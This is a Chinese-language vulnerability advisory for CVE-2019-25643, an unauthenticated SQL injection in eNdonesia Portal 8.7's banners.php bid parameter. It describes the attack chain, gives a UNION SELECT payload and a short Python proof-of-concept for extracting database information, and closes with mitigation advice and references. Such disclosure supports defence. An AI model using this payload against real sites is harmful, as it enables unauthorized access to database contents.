CVE-2019-25643 CVSS 8.2 高危

CVE-2019-25643: eNdonesia Portal SQL注入漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25643

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

eNdonesia Portal

漏洞概述

eNdonesia Portal v8.7版本存在多个SQL注入漏洞。由于未对用户输入进行有效的安全过滤，未经身份认证的攻击者可以通过向banners.php发送GET请求，并在bid参数中注入恶意SQL代码。成功利用该漏洞可执行任意SQL查询，从INFORMATION_SCHEMA等系统表中提取敏感数据库信息，导致严重的数据泄露风险。

技术细节

该漏洞的核心原因在于banners.php页面在处理bid参数时，直接将其拼接到SQL查询语句中，未使用参数化查询或进行严格的输入校验。攻击者无需用户交互（UI:N）和身份认证（PR:N），即可通过网络（AV:N）发起攻击。通过构造包含UNION SELECT语句的Payload，攻击者可以欺骗后端数据库执行额外查询。由于漏洞允许读取数据库结构和内容，对系统的机密性（C:H）构成严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站运行的是eNdonesia Portal v8.7，并定位到存在漏洞的banners.php页面。

STEP 2

武器化

攻击者构造包含SQL注入语法的恶意Payload（例如：1 UNION SELECT 1, version(), 3--），旨在提取数据库版本或结构信息。

STEP 3

交付与利用

攻击者向目标服务器发送特制的HTTP GET请求，将Payload注入到bid参数中。

STEP 4

数据窃取

后端数据库执行恶意SQL语句，将INFORMATION_SCHEMA中的敏感数据返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Please replace with actual target)
target_url = "http://target-endonesia.org/banners.php"

# Malicious payload to extract database version
# Using UNION SELECT to extract data
payload = "?bid=1 UNION SELECT 1, version(), 3--"

try:
    # Send GET request with malicious payload
    response = requests.get(target_url + payload)
    
    # Check if request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text[:500]) # Print first 500 chars for verification
    else:
        print("[-] Request failed with status code:", response.status_code)
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

eNdonesia Portal 8.7

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）以拦截针对bid参数的SQL注入攻击尝试。如果不能立即升级，请限制对banners.php文件的公网访问权限，或临时禁用该功能模块以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25643
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25643
3 Details https://www.cvedetails.com/cve/CVE-2019-25643/
4 VulDB https://vuldb.com/cve/CVE-2019-25643
5 Link http://www.endonesia.org/
6 Link https://sourceforge.net/projects/endonesia/
7 Link https://www.exploit-db.com/exploits/46559
8 Link https://www.vulncheck.com/advisories/endonesia-portal-sql-injection-via-banners-php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表